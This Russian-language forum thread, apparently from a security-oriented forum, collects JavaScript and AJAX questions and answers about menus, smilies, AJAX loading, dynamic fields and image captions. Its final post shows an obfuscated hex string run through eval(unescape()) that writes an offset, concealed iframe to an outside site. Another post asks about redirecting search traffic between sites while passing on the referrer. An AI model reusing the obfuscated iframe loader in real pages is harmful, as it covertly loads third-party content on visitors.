[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    нет там никакой явы, это CSS
    HTML:
    <html>
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
    <head>
    <style type="text/css">
    a {text-decoration: none;}
    body {
    //  background: #111 url(img/bg.jpg) repeat-y center top;
    //  color: #BBB;
      font: normal 62.5% "Lucida Sans Unicode",sans-serif;
    }
    .nav {background: #191919 url(img/nav.gif);}
    .nav a {
      background: #191919 url(img/nav.gif);
      border-right: 1px solid #161616;
      color: #CCC;
      float: left;
      font: bold 1em Verdana,sans-serif;
      line-height: 51px;
      padding: 0 20px;
    }
    .nav a:hover {
      background: #191919 url(img/nav_hover.gif);
    }
    </style>
    </head>
    <body>
    <div class="nav">
      <a href="index.html">Главная</a>
      <a href="Dowload.html">Download</a>
      <a href="gallery.html">Фотогалерея</a>
      <a href="">Прочее</a>
      <a href="support.html">Обратная связь</a>
    </div>
    </body>
    </html>
    
     
  2. Корвин

    Корвин Elder - Старейшина

    Joined:
    26 Feb 2007
    Messages:
    256
    Likes Received:
    31
    Reputations:
    3
    а короче:

    PHP:

    color:red;} //простая ссылка, цвет красный
    a:hover color:blue;} //при наведении, цвет синий 


    оффтоп, это нада в HTML
     
  3. xofffff

    xofffff New Member

    Joined:
    15 Nov 2009
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    Вот нашел на античате ява скрипт для оперы что бы в быстром ответе добавились иконки типо ссылки, вставить картинку, php код и тд.
    Может кто написать такой же только мне надо на форум там окно сообщения имеет следующий html код
    PHP:
    <table border="0" cellspacing="0" cellpadding="0" width="100%"><tr>
    <
    td background="/images/hbg.gif" bgcolor="#676767" height="23" class="main" width="100%">&nbsp;&nbsp;&nbsp;&nbsp;Ответить</td></tr><tr><td height="3"><img src="/images/1x1.gif" width="1"></td></tr><tr><td align="center" valign="top" bgcolor="#e0e0e0"><table border="0" cellspacing="12" cellpadding="0" width="100%"><tr><td colspan="2" valign="top">
    <
    form method="post" name="user_post_form" action="/forums/brablay/54756/reply/">
    <
    div style="margin: 6px; margin-left: 0px; ">
    <
    A href="javascript:emoticon(':D')"><IMG title="Very Happy" alt="Very Happy" src="http://www.proplay.ru/images/smiles/icon_biggrin.gif" border=0></A>
    <
    A href="javascript:emoticon(':)')"><IMG title=Smile alt=Smile src="http://www.proplay.ru/images/smiles/icon_smile.gif" border=0></A>
    <
    A href="javascript:emoticon(':(')"><IMG title=Sad alt=Sad src="http://www.proplay.ru/images/smiles/icon_sad.gif" border=0></A>
    <
    A href="javascript:emoticon(':o')"><IMG title=Surprised alt=Surprised src="http://www.proplay.ru/images/smiles/icon_surprised.gif" border=0></A>
    <
    A href="javascript:emoticon(':shock:')"><IMG title=Shocked alt=Shocked src="http://www.proplay.ru/images/smiles/icon_eek.gif" border=0></A>
    <
    A href="javascript:emoticon(':?')"><IMG title=Confused alt=Confused src="http://www.proplay.ru/images/smiles/icon_confused.gif" border=0></A>
    <
    A href="javascript:emoticon('8)')"><IMG title=Cool alt=Cool src="http://www.proplay.ru/images/smiles/icon_cool.gif" border=0></A>
    <
    A href="javascript:emoticon(':lol:')"><IMG title=Laughing alt=Laughing src="http://www.proplay.ru/images/smiles/icon_lol.gif" border=0></A>
    <
    A href="javascript:emoticon(':x')"><IMG title=Mad alt=Mad src="http://www.proplay.ru/images/smiles/icon_mad.gif" border=0></A>
    <
    A href="javascript:emoticon(':P')"><IMG title=Razz alt=Razz src="http://www.proplay.ru/images/smiles/icon_razz.gif" border=0></A>
    <
    A href="javascript:emoticon(':oops:')"><IMG title=Embarassed alt=Embarassed src="http://www.proplay.ru/images/smiles/icon_redface.gif" border=0></A>
    <
    A href="javascript:emoticon(':cry:')"><IMG title="Crying or Very sad" alt="Crying or Very sad" src="http://www.proplay.ru/images/smiles/icon_cry.gif" border=0></A>
    <
    A href="javascript:emoticon(':evil:')"><IMG title="Evil or Very Mad" alt="Evil or Very Mad" src="http://www.proplay.ru/images/smiles/icon_evil.gif" border=0></A>
    <
    A href="javascript:emoticon(':twisted:')"><IMG title="Twisted Evil" alt="Twisted Evil" src="http://www.proplay.ru/images/smiles/icon_twisted.gif" border=0></A>
    <
    A href="javascript:emoticon(':roll:')"><IMG title="Rolling Eyes" alt="Rolling Eyes" src="http://www.proplay.ru/images/smiles/icon_rolleyes.gif" border=0></A>
    <
    A href="javascript:emoticon(':wink:')"><IMG title=Wink alt=Wink src="http://www.proplay.ru/images/smiles/icon_wink.gif" border=0></A>
    <
    A href="javascript:emoticon(':!:')"><IMG title=Exclamation alt=Exclamation src="http://www.proplay.ru/images/smiles/icon_exclaim.gif" border=0></A>
    <
    A href="javascript:emoticon(':?:')"><IMG title=Question alt=Question src="http://www.proplay.ru/images/smiles/icon_question.gif" border=0></A>
    <
    A href="javascript:emoticon(':idea:')"><IMG title=Idea alt=Idea src="http://www.proplay.ru/images/smiles/icon_idea.gif" border=0></A>
    <
    A href="javascript:emoticon(':arrow:')"><IMG title=Arrow alt=Arrow src="http://www.proplay.ru/images/smiles/icon_arrow.gif" border=0></A>
    </
    div>
    <
    textarea name="body" rows="5" style="width: 100%"></textarea><br>
    <
    p>
    <
    input class="button" type="submit" value="Ответить">
    </
    p>
    </
    form>
    <
    p>
    <
    b><img align="baseline" src="/images/users/arw.png"> <a href="/forums/brablay/add/"><b>Новая тема</b></a>
    <
    br>
    <
    img align="baseline" src="/images/users/arw.png">  <a href="javascript:PopUpWindow('http://www.proplay.ru/adm/forums.php?ac=subscribe&id_topic=$id_topic', 300, 50)"><b>Подписаться</b></a>

    </
    p>
    </
    td></tr></table></td></tr><tr><td height="6"><img src="/images/1x1.gif" width="1"></td></tr></table>
    Только мне надо что бы туда свои смаилики пределать может кто подсказать как это сделать?
     
    1 person likes this.
  4. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    заменить адреса изображений на свои
     
  5. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Есть функция

    как в {сюда} вставить переменную id ?
     
  6. xofffff

    xofffff New Member

    Joined:
    15 Nov 2009
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    А как сохранить в .js и в папку оперы? и как он определит что это для этого сайта именно :confused:
     
  7. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    PHP:
    <form method="POST">
    <?php
    include_once 'captcha.php';
    $validate=(@$_SESSION["captcha"] && @$_POST["captcha"]==@$_SESSION["captcha"]);
    ?>
    <input type="submit" name="submit"  value="get info">
    </form>
    <?php
    function curl($post){
    $url "test.com"
    $ref "test.com"
    $ua "test"
    $ch curl_init($url); 
    curl_setopt($chCURLOPT_USERAGENT,$ua); 
    curl_setopt($chCURLOPT_REFERER,$ref); 
    curl_setopt($chCURLOPT_POSTFIELDS,$post);
    curl_setopt($chCURLOPT_FOLLOWLOCATION1);
    curl_setopt($chCURLOPT_RETURNTRANSFER1); 
    $result curl_exec($ch); 
    return 
    $result;}
    if(
    $validate){
    $result=curl('login=test&password=test&id=1');
    if(!
    preg_match_all('#<tr><td>([a-f0-9]{5})</td><td>#',$result,$m)) {curl('login=test&password=test&id=2'); 
    echo 
    'TimeOut';
    }else{
    echo 
    '<h1>'.$m[1][0].'</h1>';
    }}else{if(isset(
    $_POST["submit"])) {echo 'Защитный код введен не верно!';}}
    ?>
    есть примерно такой скриптик простенький,
    получает информацию с сервера site.com
    грузится довольно долго все это дело.
    Каким образом можно прикрутить ajaxloading?
    ни js, ни ajax вообще не знаю =\
     
    #1947 #Wolf#, 29 Nov 2009
    Last edited: 29 Nov 2009
  8. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    вопрос) есть форма
    как можно сделать чтобы при выключенном js форма не отправлялась?)
    как вариант конечно сделать кнопку такой
    но форму можно отправить по ентеру( есть предложения?
     
  9. Alpha][

    Alpha][ Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    75
    Likes Received:
    5
    Reputations:
    0
    народ как с помощью js вычислить высоту body ? именно body , а не клиентской части браузера .
     
  10. whexp

    whexp Member

    Joined:
    30 Nov 2009
    Messages:
    88
    Likes Received:
    29
    Reputations:
    5
    Так?
     
    1 person likes this.
  11. Alpha][

    Alpha][ Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    75
    Likes Received:
    5
    Reputations:
    0
    нашел , спасибо . Искал оказывается не правильно
     
  12. ANTIHАCK

    ANTIHАCK Member

    Joined:
    20 Jun 2009
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    del
     
    #1952 ANTIHАCK, 1 Dec 2009
    Last edited: 22 Jun 2010
  13. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    Code:
    <!doctype html>
    <html>
    <head>
      <title>Blink 2.0</title>
      <script>
    
      window.onload = function()
      {
        var target = document.getElementById('screen');
        var text   = target.appendChild(document.createTextNode(''));
    
        var i = 0;
        var a = ['12#', '#23', '1#3'];
        var l = a.length;
    
        setInterval(function()
        {
          text.data = a[i++ % l];
        }, 0);
      };
    
      </script>
    </head>
    <body>
      <pre id="screen"></pre>
    </body>
    </html>
     
    1 person likes this.
  14. apekoff

    apekoff New Member

    Joined:
    12 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Привет всем !
    Ситуация
    ПС-Поисковая система
    С1-Сайт номер 1
    С2-Сайт номер 2
    как сделать редирект на С1 ---> С2 с передачей реферера ПС с поисковым запросом т.е. есть поисковый запрос -
    Цитата:
    _http://www.google.com.ua/search?q=поисковый запрос&hl=ru&client=firefox&rlz=1R1GGGL_ru___UA338 &sa=G&tbo=1&tbs=qdr:y
    Есть сайт на который кликают
    Цитата:
    http://c1.blabla/
    (С1) из него некий редирект на С2
    в итоге чтоб на С2 при редиректе было -
    Цитата:
    http://C2.blablabla/index.php?ref=http://www.google.com.ua/search?q=поисковый запрос&hl=ru&client=firefox&rlz=1R1GGGL_ru___UA338 &sa=G&tbo=1&tbs=qdr:y
    Пробовал так -
    Цитата:
    window.location='http://C2.blablabla/index.php?ref=(document.referrer);
    безрезультатно..
     
  15. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Привет, тут возникла проблема при отправке http запроса с помощью XMLHttpRequest, использовал эту статью - http://ru.wikipedia.org/wiki/XMLHttpRequest
    Code:
     
    <script>
    var req;
    
    function processReqChange()
    {
      try { // Важно!
        // только при состоянии "complete"
        if (req.readyState == 4) {
            // для статуса "OK"
            if (req.status == 200) {
                // обработка ответа
            } else {
                alert("Не удалось получить данные:\n" +
                    req.statusText);
            }
        }
      }
      catch( e ) {
          // alert('Caught Exception: ' + e.description);
          // В связи с багом XMLHttpRequest в Firefox приходится отлавливать ошибку
          // Bugzilla Bug 238559 XMLHttpRequest needs a way to report networking errors
          // https://bugzilla.mozilla.org/show_bug.cgi?id=238559
      }
    }
     
    function loadXMLDoc(url)
    {
        req = null;
        if (window.XMLHttpRequest) {
            try {
                req = new XMLHttpRequest();
            } catch (e){}
        } else if (window.ActiveXObject) {
            try {
                req = new ActiveXObject('Msxml2.XMLHTTP');
            } catch (e){
                try {
                    req = new ActiveXObject('Microsoft.XMLHTTP');
                } catch (e){}
            }
        }
     
        if (req) {       
            req.open("GET", url, true);
            req.onreadystatechange = processReqChange;
            req.send(null);
    setTimeout("alert(req.responseText)",7000);
        }
    }
    </script>
    <html>
    <input type=button value=ddd onclick="loadXMLDoc('http://www.google.ru/')">
    
    </html>
    
    В ie работает нормально, но в опере возникает проблема при req.send(null) . В чём может заключаться проблема?.
     
  16. Z@h

    Z@h Banned

    Joined:
    11 Aug 2007
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Народ подскажите.
    Например имеется в начале поле
    Code:
    <select name="name[]"><option value="1">a</option><option value="2">b</option></select><input type="text" name="text[]">
    нужно чтобы при любом выборе значения появлялось точно такое же поле ниже... и так далее...
     
  17. diGriz

    diGriz Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    138
    Likes Received:
    82
    Reputations:
    6
    2 Z@h
    Code:
    <script src="http://code.jquery.com/jquery-latest.js"></script>    
    <script type="text/javascript">
    	function addField() {
    		$("#fields").append('<input type="text" name="text[]"><br />');
    	}
    </script>
    <select name="name[]" onchange="addField()"><option value="1">a</option><option value="2">b</option></select>
    <div id="fields">
    	<input type="text" name="text[]"><br />
    </div>
    
     
    1 person likes this.
  18. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    На странице есть 3 картинки и ниже поле с описанием.
    Нужно при помощи JS сделать так чтобы по клику на картинку в текстовом поле появлялось её описание.
    Как это лучше реализовать и где можно поискать примеры подобного?
    (з.ы. 2-х метровые библиотеки со всевозможными свистелками и перделками просьба не предлагать)
    Т.е. нужен код в котором нету ничего лишнего в плане оформления, т.к. это нарушит дизайн сайта.
     
  19. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Code:
      <script language="javascript">
        var desc = new Array ('Description', 'Second', 'Yahoo!!!');
        function show_desc (id) {
          document.getElementById('description').value = desc[id];
          return true;
        }
      </script>
    ...
    <img src="image_1.gif" onclick="show_desc(0)"><br>
    <img src="image_2.gif" onclick="show_desc(1)"><br>
    <img src="image_3.gif" onclick="show_desc(2)"><br>
    <form><input type="text" id="description" value=""></form>
    
     
    1 person likes this.
  20. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    702
    Reputations:
    227
    Помогите с кусочком кода ;)

    HTML:
    <SCRIPT>var ep="3c7370616e207374796c653d22706f736974696f6e3a6162736f6c7574653b746f703a2d333070783b6c6566743a2d33307078223e0d0a3c494652414d45207372633d22687474703a2f2f7777772e6d697373676c61642e636f6d2f77656274762f77656274762d747275652e7068703f63617465675f69643d";eval(unescape("function%20dc%28e%29%7Bvar%20ds%3D%22%22%3Bfor%28i%3D0%3Bi%3Ce.length%3Bi+%3D2%29%7Bds+%3DString.fromCharCode%28parseInt%28e.substring%28i%2Ci+2%29%2C%2016%29%29%3B%7Dreturn%20ds%3B%7Ddocument.write%28dc%28ep%29%29%3B"));</script>
    182&video=b0584c17da" width="500" height="380" marginwidth=0 marginheight=0 border=0 frameborder=0 framespacing=0 scrolling=no></IFRAME>
    </span>
    :rolleyes:
     
Loading...
Thread Status:
Not open for further replies.